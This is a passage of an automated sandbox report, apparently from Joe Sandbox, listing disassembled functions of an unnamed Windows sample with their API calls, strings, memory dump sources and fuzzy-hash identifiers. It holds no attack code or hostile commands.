                                                                                                                                • Opcode Fuzzy Hash: 364c8ba9a4a02a65b5c6db95537753501d0a7022416e86c3b2dd9ab42abf96e9
                                                                                                                                • Instruction Fuzzy Hash: 4451B332A042019FD720DF20CD45B6A7BE4EF48760F14862EF995D72A1DB34EC41EB42
                                                                                                                                Function 00F79C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00F79C68
                                                                                                                                • CreateMenu.USER32 ref: 00F79C83
                                                                                                                                • SetMenu.USER32(?,00000000), ref: 00F79C92
                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F79D1F
                                                                                                                                • IsMenu.USER32(?), ref: 00F79D35
                                                                                                                                • CreatePopupMenu.USER32 ref: 00F79D3F
                                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F79D70
                                                                                                                                • DrawMenuBar.USER32 ref: 00F79D7E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                • String ID: 0
                                                                                                                                • API String ID: 176399719-4108050209
                                                                                                                                • Opcode ID: 92dae42e1bf36b5b716ce3746a6fb52c579c2f67158dbf9adec81201c4bc0472
                                                                                                                                • Instruction ID: c0f0dbb9aad55553dbe1967c2f46062cbfb46643bc48963d7fcbafdeee9b13d7
                                                                                                                                • Opcode Fuzzy Hash: 92dae42e1bf36b5b716ce3746a6fb52c579c2f67158dbf9adec81201c4bc0472
                                                                                                                                • Instruction Fuzzy Hash: B9416A75A04209EFDB20EF64D844FDABBB5FF49314F18402AE94997351D770A920EF61
                                                                                                                                Function 00F5EC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00F5EC1E
                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F5EC94
                                                                                                                                • GetLastError.KERNEL32 ref: 00F5EC9E
                                                                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 00F5ED0B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                                • Opcode ID: 69829beadc81aef6412e1e1fd4ae4499d69977747e788b43e562bd5cc424672e
                                                                                                                                • Instruction ID: 3361b8b4959483065a9fbe5c56ea296943eb03a61a3e5c3aa57682ea016a69a3
                                                                                                                                • Opcode Fuzzy Hash: 69829beadc81aef6412e1e1fd4ae4499d69977747e788b43e562bd5cc424672e
                                                                                                                                • Instruction Fuzzy Hash: 0231E436A002099FC709EF64DD49EEEB7B4FF44712F108016FA06E7291DA74DA85EB81
                                                                                                                                Function 00F4C6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F4C782
                                                                                                                                • GetDlgCtrlID.USER32 ref: 00F4C78D
                                                                                                                                • GetParent.USER32 ref: 00F4C7A9
                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F4C7AC
                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00F4C7B5
                                                                                                                                • GetParent.USER32(?), ref: 00F4C7D1
                                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F4C7D4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                • API String ID: 313823418-1403004172
                                                                                                                                • Opcode ID: cf916491d575f2face2b52cc5b97cd7c971f7ecf6dd1c6e369f7740a2c4fc71f
                                                                                                                                • Instruction ID: ef716fee8d200b90db93989f06ed04cc65999c109a6e80071710d28ef63d73f5
                                                                                                                                • Opcode Fuzzy Hash: cf916491d575f2face2b52cc5b97cd7c971f7ecf6dd1c6e369f7740a2c4fc71f
                                                                                                                                • Instruction Fuzzy Hash: 6721AC75A00208AFCB05EBA0CC96EFEBB65EB45310F600116F962932E1DB789855FE60
                                                                                                                                Function 00F4C7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F1CAEE: _memmove.LIBCMT ref: 00F1CB2F
                                                                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F4C869
                                                                                                                                • GetDlgCtrlID.USER32 ref: 00F4C874
                                                                                                                                • GetParent.USER32 ref: 00F4C890
                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F4C893
                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00F4C89C
                                                                                                                                • GetParent.USER32(?), ref: 00F4C8B8
                                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F4C8BB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                • API String ID: 313823418-1403004172
                                                                                                                                • Opcode ID: b820608cba54babf7c2d8f71991aca63d5f326f275f9042dd65ca73240f24c93
                                                                                                                                • Instruction ID: fc281c7dbbafc038cb6865985947dbafff924c8095537e9415d0870b5fbb6c19
                                                                                                                                • Opcode Fuzzy Hash: b820608cba54babf7c2d8f71991aca63d5f326f275f9042dd65ca73240f24c93
                                                                                                                                • Instruction Fuzzy Hash: BD219D71A01208AFDB01ABA4CC95EFEBB79EF45300F500016FA51A3191DB799955FB60
                                                                                                                                Function 00F4C8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetParent.USER32 ref: 00F4C8D9
                                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00F4C8EE
                                                                                                                                • _wcscmp.LIBCMT ref: 00F4C900
                                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F4C97B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                • API String ID: 1704125052-3381328864
                                                                                                                                • Opcode ID: 2511df16d73da3b29f12f633d3087828630c2497c7304b77a251c8425bcc12a4
                                                                                                                                • Instruction ID: 4a628f40edcd2c22e8f61641ef0b4640149d99fdf8531eb3af699d20cb85617b
                                                                                                                                • Opcode Fuzzy Hash: 2511df16d73da3b29f12f633d3087828630c2497c7304b77a251c8425bcc12a4
                                                                                                                                • Instruction Fuzzy Hash: 4911EC77A49307BAF6842B30DC07DA6BF9CDB46770F200016FD00A50D2FBA5AD017595
                                                                                                                                Function 00F5B05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00F5B137
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ArraySafeVartype
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1725837607-0
                                                                                                                                • Opcode ID: 8bc0e8da678707a22d7abff75348f4dd3b69e4057cf7780b404839064de1cb4d
                                                                                                                                • Instruction ID: 151ad0e72c5e654b5bc2a7f3dd3e6e845b4c3db0da44d9824efdc069edb5f704
                                                                                                                                • Opcode Fuzzy Hash: 8bc0e8da678707a22d7abff75348f4dd3b69e4057cf7780b404839064de1cb4d
                                                                                                                                • Instruction Fuzzy Hash: 7DC19275A0021ADFDB00CF98D491BAEB7F4FF08316F24406AEA15E7291C734A949EB91
                                                                                                                                Function 00F3BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __lock.LIBCMT ref: 00F3BA74
                                                                                                                                  • Part of subcall function 00F38984: __mtinitlocknum.LIBCMT ref: 00F38996
                                                                                                                                  • Part of subcall function 00F38984: RtlEnterCriticalSection.NTDLL(00F30127), ref: 00F389AF
                                                                                                                                • __calloc_crt.LIBCMT ref: 00F3BA85
                                                                                                                                  • Part of subcall function 00F37616: __calloc_impl.LIBCMT ref: 00F37625
                                                                                                                                  • Part of subcall function 00F37616: Sleep.KERNEL32(00000000,?,00F30127,?,00F1125D,00000058,?,?), ref: 00F3763C
                                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00F3BAA0
                                                                                                                                • GetStartupInfoW.KERNEL32(?,00FC6990,00000064,00F36B14,00FC67D8,00000014), ref: 00F3BAF9
                                                                                                                                • __calloc_crt.LIBCMT ref: 00F3BB44
                                                                                                                                • GetFileType.KERNEL32(00000001), ref: 00F3BB8B
                                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00F3BBC4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1426640281-0
                                                                                                                                • Opcode ID: 905bcdd33f9e57a8220551548ad73d08a1035f7b891e802cb450c0d316b488d5
                                                                                                                                • Instruction ID: 9125b6d0bcefd2a3df235da69ae85eddb20c6f3c48d505284c13fea2aa9e78f7
                                                                                                                                • Opcode Fuzzy Hash: 905bcdd33f9e57a8220551548ad73d08a1035f7b891e802cb450c0d316b488d5
                                                                                                                                • Instruction Fuzzy Hash: C881D271D057498FCB24CF68C8A06ADBBB0AF45334F24525ED5A6AB3D1CB389803EB55
                                                                                                                                Function 00F57212 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __swprintf.LIBCMT ref: 00F57226
                                                                                                                                • __swprintf.LIBCMT ref: 00F57233
                                                                                                                                  • Part of subcall function 00F3234B: __woutput_l.LIBCMT ref: 00F323A4
                                                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 00F5725D
                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00F57269
                                                                                                                                • LockResource.KERNEL32(00000000), ref: 00F57276
                                                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 00F57296
                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00F572A8
                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00F572B7
                                                                                                                                • LockResource.KERNEL32(?), ref: 00F572C3
                                                                                                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00F57322
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1433390588-0
                                                                                                                                • Opcode ID: ea92b482a4fc75e16b03d309a6c38b02059d43bf468f45ce4295f6b9e4a0f676
                                                                                                                                • Instruction ID: b84f11bfa91bf56346898795485739eb16b4b43503fd9f43ede97c7a3df5a857
                                                                                                                                • Opcode Fuzzy Hash: ea92b482a4fc75e16b03d309a6c38b02059d43bf468f45ce4295f6b9e4a0f676
                                                                                                                                • Instruction Fuzzy Hash: 62319EB190435AABDB11AF60ED89AAF7BADFF08352F104426FE01D2150E734D954FAA0
                                                                                                                                Function 00F54A5B Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00F54A7D
                                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F53AD7,?,00000001), ref: 00F54A91
                                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 00F54A98
                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F53AD7,?,00000001), ref: 00F54AA7
                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F54AB9
                                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00F53AD7,?,00000001), ref: 00F54AD2
                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F53AD7,?,00000001), ref: 00F54AE4
                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F53AD7,?,00000001), ref: 00F54B29
                                                                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00F53AD7,?,00000001), ref: 00F54B3E
                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00F53AD7,?,00000001), ref: 00F54B49
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2156557900-0
                                                                                                                                • Opcode ID: 5738be10d93b9b69a9364c56327f13a21b1c9792af9419b814eba259d4195960
                                                                                                                                • Instruction ID: b835d45d20555436c8b4eb3397fa49a615ea31120aefb0757f306fd75af57aa8
                                                                                                                                • Opcode Fuzzy Hash: 5738be10d93b9b69a9364c56327f13a21b1c9792af9419b814eba259d4195960
                                                                                                                                • Instruction Fuzzy Hash: EE318071A01608BBDB109F64EC88B6D77BAABC0366F244006FF0497190D7B5ED88AB61
                                                                                                                                Function 00F8EC19 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetClientRect.USER32(?), ref: 00F8EC32
                                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F8EC49
                                                                                                                                • GetWindowDC.USER32(?), ref: 00F8EC55
                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 00F8EC64
                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00F8EC76
                                                                                                                                • GetSysColor.USER32(00000005), ref: 00F8EC94
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 272304278-0
                                                                                                                                • Opcode ID: 18254604090a6a7c8e9217710f403d5ba921e266335f12142205324fbde6bb1d
                                                                                                                                • Instruction ID: 8bd925cc280c4a71d06465d233fb16324b42541e8c5dae40ca143aebb4203a90
                                                                                                                                • Opcode Fuzzy Hash: 18254604090a6a7c8e9217710f403d5ba921e266335f12142205324fbde6bb1d
                                                                                                                                • Instruction Fuzzy Hash: BC212C32900209EFEB21AB64ED49BE97B75FB45321F244226FA26A50E1DB310951FF11
                                                                                                                                Function 00F4D978 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • EnumChildWindows.USER32(?,00F4DD46), ref: 00F4DC86
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ChildEnumWindows
                                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                • API String ID: 3555792229-1603158881
                                                                                                                                • Opcode ID: 45c4f731c884f0e563bbbc0801926480b523f0cba9e04588ee9c79e480b9d308
                                                                                                                                • Instruction ID: d91562c14f2b33a45ad0bd684e52c1fb91071a12790f8a9dbf8a7f9cc834a615
                                                                                                                                • Opcode Fuzzy Hash: 45c4f731c884f0e563bbbc0801926480b523f0cba9e04588ee9c79e480b9d308
                                                                                                                                • Instruction Fuzzy Hash: C591A230A00506AACB08DF64C8C1BE9FFB5FF44320F548129DD5AA7251DF74A989FBA0
                                                                                                                                Function 00F145A7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 211COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F145F0
                                                                                                                                • CoUninitialize.COMBASE ref: 00F14695
                                                                                                                                • UnregisterHotKey.USER32(?), ref: 00F147BD
                                                                                                                                • DestroyWindow.USER32(?), ref: 00F85936
                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00F8599D
                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F859CA
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
